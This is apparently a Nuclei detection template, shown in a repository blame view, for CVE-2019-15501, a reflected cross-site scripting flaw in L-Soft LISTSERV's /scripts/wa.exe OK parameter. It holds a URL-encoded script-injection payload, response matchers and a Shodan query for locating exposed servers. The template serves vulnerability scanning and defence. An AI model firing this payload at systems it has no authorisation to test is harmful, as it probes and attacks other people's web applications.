nuclei-templates/http/cves/2019/CVE-2019-15501.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2021-08-24 01:15:08 +00:00
id: CVE-2019-15501
info:
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter,arafatansari
2021-08-24 01:15:08 +00:00
severity: medium
description: |
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
2021-08-24 11:43:37 +00:00
reference:
2021-08-24 11:37:33 +00:00
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2019-15501
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-15501
cwe-id: CWE-79
metadata:
max-request: 1
shodan-query: http.html:"LISTSERV"
2023-06-04 08:13:42 +00:00
verified: true
tags: cve,cve2019,xss,listserv,edb
2021-08-24 01:15:08 +00:00
http:
2021-08-24 01:15:08 +00:00
- method: GET
path:
2021-08-24 11:37:33 +00:00
- '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-24 01:15:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2021-08-24 01:15:08 +00:00
words:
2021-08-24 11:37:33 +00:00
- '</script><script>alert(document.domain)</script>'
- 'LISTSERV'
condition: and
case-insensitive: true
2021-08-24 01:15:08 +00:00
- type: word
part: header
2021-08-24 11:37:33 +00:00
words:
- text/html
- type: status
status:
- 200